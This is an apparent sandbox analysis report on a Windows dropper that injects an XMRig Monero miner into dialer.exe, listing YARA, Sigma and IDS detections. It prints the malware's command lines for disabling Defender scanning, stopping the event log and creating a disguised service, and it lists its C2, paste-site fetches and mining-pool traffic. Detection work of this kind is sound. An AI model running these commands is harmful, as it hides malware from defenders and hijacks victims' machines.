00000042.00000002.3442004748.0000000140001000.00000040.00000001.00020000.00000000.sdmp | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown | 0x36fc08:$a1: mining.set_target; 0x361e30:$a2: XMRIG_HOSTNAME; 0x3647a8:$a3: Usage: xmrig [OPTIONS]; 0x361e08:$a4: XMRIG_VERSION

Unpacked PEs

Source | Rule | Description | Author | Strings
66.2.dialer.exe.140000000.0.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
66.2.dialer.exe.140000000.0.unpack | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown | 0x370008:$a1: mining.set_target; 0x362230:$a2: XMRIG_HOSTNAME; 0x364ba8:$a3: Usage: xmrig [OPTIONS]; 0x362208:$a4: XMRIG_VERSION
66.2.dialer.exe.140000000.0.unpack | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth | 0x3b5761:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
66.2.dialer.exe.140000000.0.unpack | MALWARE_Win_CoinMiner02 | Detects coinmining malware | ditekSHen | 0x3b5fd8:$s1: %s/%s (Windows NT %lu.%lu; 0x3b9600:$s3: \\.\WinRing0_; 0x3671a8:$s4: pool_wallet; $s5: cryptonight at 0x3615d8, 0x3615e8, 0x3615f8, 0x361608, 0x361620, 0x361630, 0x361640, 0x361658, 0x361668, 0x361680, 0x361698, 0x3616a8, 0x3616b8, 0x3616c8, 0x3616e0, 0x3616f8, 0x361708, 0x361718

The memory dumps and the unpacked PE share process index 0x42 (66) and image base 0x140000000: the miner image is recovered from a dialer.exe instance, not from the dropper itself, which is why the submitted file matches no miner rule while the injected process does.

Sigma Overview

Change of critical system settings

Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\egFMhHSlmf.exe", ParentImage: C:\Users\user\Desktop\egFMhHSlmf.exe, ParentProcessId: 1764, ParentProcessName: egFMhHSlmf.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 2676, ProcessName: powercfg.exe

          System Summary

Source: Process started; Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp); Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OkULRfyuHQtJ{ ... (the same obfuscated command line as powershell.exe PID 3768 in the process tree above; the record is truncated in the report)
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OkULRfyuHQtJ{ ... (the same obfuscated command line as powershell.exe PID 3768 in the process tree above; the record is truncated in the report)
          Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\egFMhHSlmf.exe", ParentImage: C:\Users\user\Desktop\egFMhHSlmf.exe, ParentProcessId: 1764, ParentProcessName: egFMhHSlmf.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7056, ProcessName: powershell.exe
          Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{ed3c9ad9-1a05-4753-a177-d35f4db59610}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 3820, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 928, ProcessName: svchost.exe
          Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\egFMhHSlmf.exe", ParentImage: C:\Users\user\Desktop\egFMhHSlmf.exe, ParentProcessId: 1764, ParentProcessName: egFMhHSlmf.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", ProcessId: 3540, ProcessName: sc.exe
          Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\egFMhHSlmf.exe", ParentImage: C:\Users\user\Desktop\egFMhHSlmf.exe, ParentProcessId: 1764, ParentProcessName: egFMhHSlmf.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7056, ProcessName: powershell.exe

          HIPS / PFW / Operating System Protection Evasion

          Source: Process started | Author: Joe Security | Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\egFMhHSlmf.exe", ParentImage: C:\Users\user\Desktop\egFMhHSlmf.exe, ParentProcessId: 1764, ParentProcessName: egFMhHSlmf.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 5704, ProcessName: sc.exe
          Timestamp                        SID      Severity  Classtype                                 Source IP    Source Port  Destination IP  Destination Port  Protocol
          2024-10-10T04:56:07.950720+0200  2047928  2         Crypto Currency Mining Activity Detected  192.168.2.6  61214        1.1.1.1         53                UDP
          2024-10-10T04:56:13.700818+0200  2044697  1         A Network Trojan was detected             192.168.2.6  49760        188.114.97.3    443               TCP
          2024-10-10T04:57:08.272795+0200  2051004  2         Crypto Currency Mining Activity Detected  192.168.2.6  65331        188.114.97.3    443               TCP
          2024-10-10T04:58:14.573518+0200  2051004  2         Crypto Currency Mining Activity Detected  192.168.2.6  65333        188.114.97.3    443               TCP

          AV Detection

          Source: jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su | Virustotal: Detection: 12%
          Source: pool.supportxmr.com | Virustotal: Detection: 7%
          Source: C:\ProgramData\Google\Chrome\updater.exe | ReversingLabs: Detection: 73%
          Source: C:\ProgramData\Google\Chrome\updater.exe | Virustotal: Detection: 75%
          Source: egFMhHSlmf.exe | ReversingLabs: Detection: 73%
          Source: egFMhHSlmf.exe | Virustotal: Detection: 75%
          Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Windows\System32\dialer.exe | Code function: 26_2_0000000140001000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext
          Source: C:\Windows\System32\dialer.exe | Code function: 63_2_0000000140001000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext

          Bitcoin Miner

          Source: Yara match | File source: sslproxydump.pcap, type: PCAP
          Source: Yara match | File source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000042.00000002.3447887034.0000028A981B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000042.00000002.3442004748.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
          Source: dialer.exe | String found in binary or memory: cryptonight/0
          Source: egFMhHSlmf.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 00000025.00000003.2206694268.0000017ADE760000.00000004.00000001.00020000.00000000.sdmp
          Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
          Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
          Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
          Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
          Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
          Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
          Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
          Source: C:\Windows\System32\dialer.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
          Source: C:\Windows\System32\conhost.exe | Code function: 32_2_000001D29E8CE110 FindFirstFileExW
          Source: C:\Windows\System32\winlogon.exe | Code function: 50_2_000002D0165EE110 FindFirstFileExW
          Source: C:\Windows\System32\lsass.exe | Code function: 64_2_000002D6F151E110 FindFirstFileExW
          Source: C:\Windows\System32\conhost.exe | Code function: 68_2_00000146F6B0E110 FindFirstFileExW
          Source: C:\Windows\System32\svchost.exe | Code function: 69_2_0000014E41FDE110 FindFirstFileExW
          Source: C:\Windows\System32\dwm.exe | Code function: 70_2_000001D15B08E110 FindFirstFileExW

          Networking

          Source: Network traffic | Suricata IDS: 2044697 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M3 : 192.168.2.6:49760 -> 188.114.97.3:443
          Source: unknown | DNS query: name: rentry.co
          Source: unknown | DNS query: name: justpaste.it
          Source: unknown | DNS query: name: pastebin.com
          Source: Joe Sandbox View | IP Address: 104.26.3.16
          Source: Joe Sandbox View | IP Address: 172.67.19.24
          Source: Joe Sandbox View | IP Address: 188.114.97.3
          Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
          Source: Joe Sandbox View | ASN Name: ESPOL-ASPL
          Source: Network traffic | Suricata IDS: 2047928 - Severity 2 - ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com) : 192.168.2.6:61214 -> 1.1.1.1:53
          Source: Network traffic | Suricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.6:65333 -> 188.114.97.3:443
          Source: Network traffic | Suricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.6:65331 -> 188.114.97.3:443
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /5apf98os/raw HTTP/1.1Accept: */*Connection: closeHost: rentry.coUser-Agent: cpp-httplib/0.12.6
          Source: global trafficHTTP traffic detected: GET /f86v1 HTTP/1.1Accept: */*Connection: closeHost: justpaste.itUser-Agent: cpp-httplib/0.12.6
          Source: global trafficHTTP traffic detected: GET /raw/sFxN07Y7 HTTP/1.1Accept: */*Connection: closeHost: pastebin.comUser-Agent: cpp-httplib/0.12.6
          Source: global trafficDNS traffic detected: DNS query: pool.supportxmr.com
          Source: global trafficDNS traffic detected: DNS query: rentry.co
          Source: global trafficDNS traffic detected: DNS query: justpaste.it
          Source: global trafficDNS traffic detected: DNS query: pastebin.com
          Source: global trafficDNS traffic detected: DNS query: jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su
          Source: unknownHTTP traffic detected: POST /api/endpoint.php HTTP/1.1Accept: */*Connection: closeContent-Length: 374Content-Type: application/jsonHost: jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.suUser-Agent: cpp-httplib/0.12.6
          Source: lsass.exe, 00000040.00000003.2552488160.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
          Source: updater.exe, 00000025.00000003.2206694268.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
          Source: updater.exe, 00000025.00000003.2206694268.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
          Source: updater.exe, 00000025.00000003.2206694268.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
          Source: updater.exe, 00000025.00000003.2206694268.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
          Source: updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
          Source: lsass.exe, 00000040.00000003.2552488160.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
          Source: powershell.exe, 0000001D.00000002.2244051114.00000217E6C65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2244051114.00000217E6AC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: lsass.exe, 00000040.00000003.2552488160.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
          Source: powershell.exe, 0000001D.00000002.2211112447.00000217D6C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://rh.symcb.com/rh.crl0
          Source: updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://rh.symcb.com/rh.crt0
          Source: updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://rh.symcd.com0&
          Source: updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
          Source: updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com0
          Source: powershell.exe, 0000001D.00000002.2211112447.00000217D6A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
          Source: updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
          Source: updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
          Source: powershell.exe, 0000001D.00000002.2211112447.00000217D6C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 0000001D.00000002.2211112447.00000217D6A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 0000001D.00000002.2244051114.00000217E6AC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 0000001D.00000002.2244051114.00000217E6AC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 0000001D.00000002.2244051114.00000217E6AC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
          Source: updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
          Source: updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa06
          Source: powershell.exe, 0000001D.00000002.2211112447.00000217D6C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 0000001D.00000002.2211112447.00000217D7B9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 0000001D.00000002.2254826196.00000217EEEFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.coP
          Source: powershell.exe, 0000001D.00000002.2244051114.00000217E6AC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65331
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 65333 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 65331 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65333
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734

          Spam, unwanted Advertisements and Ransom Demands

          Source: C:\Users\user\Desktop\egFMhHSlmf.exe | File written: C:\Windows\System32\drivers\etc\hosts

          System Summary

          Source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
          Source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
          Source: 00000042.00000002.3442004748.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: C:\Users\user\Desktop\egFMhHSlmf.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 29_2_00007FFD3467E0B8 NtUnmapViewOfSection
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 29_2_00007FFD3467E12C NtResumeThread
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 29_2_00007FFD3467E10C NtSetContextThread
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 29_2_00007FFD3467E0EA NtWriteVirtualMemory
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 29_2_00007FFD3467E098 NtUnmapViewOfSection
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 29_2_00007FFD34680C6D NtWriteVirtualMemory
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 29_2_00007FFD3467E11C NtSetContextThread
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 29_2_00007FFD34680A4E NtUnmapViewOfSection
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 29_2_00007FFD34680F30 NtSetContextThread
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 29_2_00007FFD34680FF4 NtResumeThread
          Source: C:\Windows\System32\dllhost.exe | Code function: 45_2_0000000140001860 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle
          Source: C:\Windows\System32\winlogon.exe | Code function: 50_2_000002D0165E2990 NtEnumerateValueKey,NtEnumerateValueKey
          Source: C:\Windows\System32\lsass.exe | Code function: 64_2_000002D6F151211C NtQuerySystemInformation,StrCmpNIW
          Source: C:\Windows\System32\lsass.exe | Code function: 64_2_000002D6F1512604 NtQueryDirectoryFileEx,GetFileType,StrCpyW
          Source: C:\Windows\System32\dialer.exe | Code function: 65_2_0000000140001394 NtMapCMFModule
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 67_2_00007FFD346A0C5D NtWriteVirtualMemory
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 67_2_00007FFD346A0F20 NtSetContextThread
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 67_2_00007FFD3469DF98 NtUnmapViewOfSection
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 67_2_00007FFD346A0FE4 NtResumeThread
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 67_2_00007FFD3469E078 NtUnmapViewOfSection
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 67_2_00007FFD346A0A3E NtUnmapViewOfSection
          Source: C:\Windows\System32\dwm.exe | Code function: 70_2_000001D15B082990 NtEnumerateValueKey,NtEnumerateValueKey
          Source: C:\ProgramData\Google\Chrome\updater.exe | File created: C:\Windows\TEMP\xptjtnajcbas.sys
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File deleted: C:\Windows\Temp\__PSScriptPolicyTest_s1u0d5sj.rn0.ps1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 29_2_00007FFD3467DD68
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 29_2_00007FFD3467B3FB
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 29_2_00007FFD3467C498
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 29_2_00007FFD34673E45
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 29_2_00007FFD3467C9FB
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 29_2_00007FFD346716BF
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 29_2_00007FFD3467E339
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 29_2_00007FFD346736F1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 29_2_00007FFD346716FA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 29_2_00007FFD3467BFF2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 29_2_00007FFD34740001
          Source: C:\Windows\System32\conhost.exe | Code function: 32_3_000001D29E891FF4
          Source: C:\Windows\System32\conhost.exe | Code function: 32_3_000001D29E8A3CD8
          Source: C:\Windows\System32\conhost.exe | Code function: 32_3_000001D29E89D510
          Source: C:\Windows\System32\conhost.exe | Code function: 32_2_000001D29E8C2BF4
          Source: C:\Windows\System32\conhost.exe | Code function: 32_2_000001D29E8D48D8
          Source: C:\Windows\System32\conhost.exe | Code function: 32_2_000001D29E8CE110
          Source: C:\Windows\System32\dllhost.exe | Code function: 45_2_0000000140001CF0
          Source: C:\Windows\System32\dllhost.exe | Code function: 45_2_0000000140002D54
          Source: C:\Windows\System32\dllhost.exe | Code function: 45_2_0000000140001274
          Source: C:\Windows\System32\dllhost.exe | Code function: 45_2_0000000140002434
          Source: C:\Windows\System32\dllhost.exe | Code function: 45_2_00000001400031D8
          Source: C:\Windows\System32\winlogon.exe | Code function: 50_3_000002D016581FF4
          Source: C:\Windows\System32\winlogon.exe | Code function: 50_3_000002D01658D510
          Source: C:\Windows\System32\winlogon.exe | Code function: 50_3_000002D016593CD8
          Source: C:\Windows\System32\winlogon.exe | Code function: 50_2_000002D0165E2BF4
          Source: C:\Windows\System32\winlogon.exe | Code function: 50_2_000002D0165EE110
          Source: C:\Windows\System32\winlogon.exe | Code function: 50_2_000002D0165F48D8
          Source: C:\Windows\System32\lsass.exe | Code function: 64_3_000002D6F14F3CD8
          Source: C:\Windows\System32\lsass.exe | Code function: 64_3_000002D6F14ED510
          Source: C:\Windows\System32\lsass.exe | Code function: 64_3_000002D6F14E1FF4
          Source: C:\Windows\System32\lsass.exe | Code function: 64_2_000002D6F15248D8
          Source: C:\Windows\System32\lsass.exe | Code function: 64_2_000002D6F151E110
          Source: C:\Windows\System32\lsass.exe | Code function: 64_2_000002D6F1512BF4
          Source: C:\Windows\System32\dialer.exe | Code function: 65_2_0000000140003250
          Source: C:\Windows\System32\dialer.exe | Code function: 65_2_00000001400027D0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 67_2_00007FFD3469DD58
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 67_2_00007FFD34699F4D
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 67_2_00007FFD34696CC5
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 67_2_00007FFD34693E41
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 67_2_00007FFD3469E329
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 67_2_00007FFD3469DBC5
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 67_2_00007FFD3469DC31
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 67_2_00007FFD349168F3
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 67_2_00007FFD349151D2
          Source: C:\Windows\System32\conhost.exe | Code function: 68_3_00000146F6AD1FF4
          Source: C:\Windows\System32\conhost.exe | Code function: 68_3_00000146F6ADD510
          Source: C:\Windows\System32\conhost.exe | Code function: 68_3_00000146F6AE3CD8
          Source: C:\Windows\System32\conhost.exe | Code function: 68_2_00000146F6B02BF4
          Source: C:\Windows\System32\conhost.exe | Code function: 68_2_00000146F6B0E110
